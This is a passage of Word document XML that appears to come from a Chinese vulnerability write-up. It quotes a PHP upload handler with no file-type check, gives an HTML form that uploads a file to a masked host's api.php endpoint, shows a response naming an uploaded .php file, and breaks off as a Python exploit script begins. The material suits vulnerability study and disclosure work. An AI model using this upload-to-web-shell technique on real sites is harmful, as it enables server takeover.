              <w:lef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0" w:line="200" w:lineRule="exact"/>
              <w:ind w:left="758" w:right="-9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$websit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="4483"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
              <w:ind w:left="2012" w:right="194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echo $website['webid']; if(!$website){</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="391" w:lineRule="auto"/>
              <w:ind w:left="2928" w:right="194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5"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">die('error'); </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Console"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>exit;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="198" w:lineRule="exact"/>
              <w:ind w:left="0" w:right="765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9"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
              <w:ind w:left="2928" w:right="722" w:hanging="917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5"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">if($_FILES["file"]["error"]&gt;0){ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Console"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>echo '&lt;script</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="391" w:lineRule="auto"/>
              <w:ind w:left="180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w w:val="95"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>type="text/javascript"&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Console"/>
                <w:color w:val="333333"/>
                <w:w w:val="95"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">parent.PZ.sendfeedback_upload </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Console"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>({log:"success",msg:"error1"});&lt;/script&gt;';</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:ind w:left="1005" w:right="1290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exit;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="124"/>
              <w:ind w:left="2012" w:right="-11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}else{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3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:rsidR="00292EF3" w:rsidRDefault="00292EF3">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="4"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:ind w:left="1075" w:right="1290"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Console"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Console"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>$fsize=$_FILES['file']['size']/1024;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="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4839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$fsize&gt;5120){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 w:firstLine="3662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'&lt;script </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t xml:space="preserve">type="text/javascript"&gt;parent.PZ.sendfeedback_upload </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>({log:"success",msg:"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>error2"});&lt;/script&gt;';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="2423" w:right="882"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>exit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65"/>
                    <w:ind w:left="1076" w:right="625"/>
                    <w:jc w:val="center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获取扩展名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7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213" w:firstLine="914"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$typename=</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>strtolower(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>pathinfo($_FILES['file'] ['name'],PATHINFO_EXTENSION));</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="215" w:lineRule="exact"/>
                    <w:ind w:left="1076" w:right="625"/>
                    <w:jc w:val="center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组合文件名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$filename=</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>date(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'dHis').'_'.</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>randomkeys(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>6).'.'.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$typename;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62"/>
                    <w:ind w:left="1076" w:right="824"/>
                    <w:jc w:val="center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组合路径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180" w:right="213" w:firstLine="914"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$path=setup_upfolder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website['webid'].'/'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>.se tup_uptemp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filename;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095" w:right="50" w:firstLine="1833"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">// shell </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>move_uploaded_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>file(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$_FILES['file']['tmp_name']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path);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180" w:right="50" w:firstLine="2748"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>echo</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> '&lt;script </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t xml:space="preserve">type="text/javascript"&gt;parent.PZ.sendfeedback_upload </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>({log:"success",file:"'.$filename.'"});&lt;/script&gt;';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3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88" w:lineRule="auto"/>
                    <w:ind w:left="1095" w:right="467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 default:</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="1076" w:right="183"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$url=$_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>SERVER[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"QUERY_STRING</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"];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$url!=''){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$url=preg_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>replace(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'/^\//','',$url);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gotourl(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$url);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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  <w:lang w:eastAsia="zh-C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4838" type="#_x0000_t202" style="width:337.5pt;height:50.8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?&gt;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line="241" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>前面直接引入了配置文件、方法封装、操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件，没有做其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="34" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s4837" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.55pt;width:337.5pt;height:490.35pt;z-index:728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28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color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t xml:space="preserve">arg($aname='log',$gtype='post',$atype='string',$len= </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>0){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4742"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$val=''; </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>switch(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$gtype){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"get":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@$val=$_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>GET[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$aname];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"post":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@$val=$_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>POST[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$aname];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"all":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012" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>@$val=$_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>GET[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$aname]; </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>if($val=='')@$val=$_POST[$aname];</w:t>
                  </w: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switch(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$atype){</w:t>
                  </w:r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'int':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$val=='')$val='0';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sprintf(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'%.0f',$val);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'num':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2012" w:right="2307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floatval(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$val); if($val&lt;1)$val=1;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2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'url':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012" w:right="982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trim(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$val); StopAttack($aname,$val,$gtype);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urldecode(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$val);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跟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看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>arg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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4836" type="#_x0000_t202" style="width:337.5pt;height:507.2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'txt':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2012" w:right="982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trim(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$val); StopAttack($aname,$val,$gtype);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urldecode(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$val);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htmlspecialchars(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$val);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'rate':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2012" w:right="2187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urldecode(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$val); if($val=='')$val=0;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$val</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>=(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>float)$val;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sprintf(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'%.4f',$val);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'decimal':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2012" w:right="2187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urldecode(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$val); if($val=='')$val=0;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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$val</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>=(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>float)$val;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sprintf(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'%.'.</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>goif(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$len,$len,2).'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>f</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>',$val)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095" w:right="4188"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>case</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 'none': break; default:</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3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StopAttack(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$aname,$val,$gtype);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$val=</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>htmlspecialchars(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$val);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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break</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333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$val;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a3"/>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据构造表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId93"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="160"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="231"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s4835" type="#_x0000_t202" style="width:337.5pt;height:116.0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28"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">&lt;form </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t xml:space="preserve">action="http://**.**.**.**/api.php?log=feedback_uplo </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ad" method="post" enctype="multipart/form-data"&gt;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&lt;input type="file" name="file"&gt;&lt;br&gt;&lt;br&gt;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&lt;input type=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"submit" value="upload"&gt;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&lt;/form&gt;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0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="64"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s4834" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:17.65pt;width:337.5pt;height:83.45pt;z-index:736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"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana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28"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">&lt;script </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>type="text/javascript"&gt;parent.PZ.sendfeedback_upload ({log:"success"</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>,file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:"22170707_shhxyo.php"});&lt;/scrip </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>t&gt;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/>
        </w:rPr>
        <w:t>Response:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="37"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s4833" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.15pt;width:339.55pt;height:308.85pt;z-index:738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Verdana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72"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>#!/</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>usr/bin/env python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4783"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>#coding=utf-8 import requests import re</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="10"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana"/>
                      <w:sz w:val="26"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
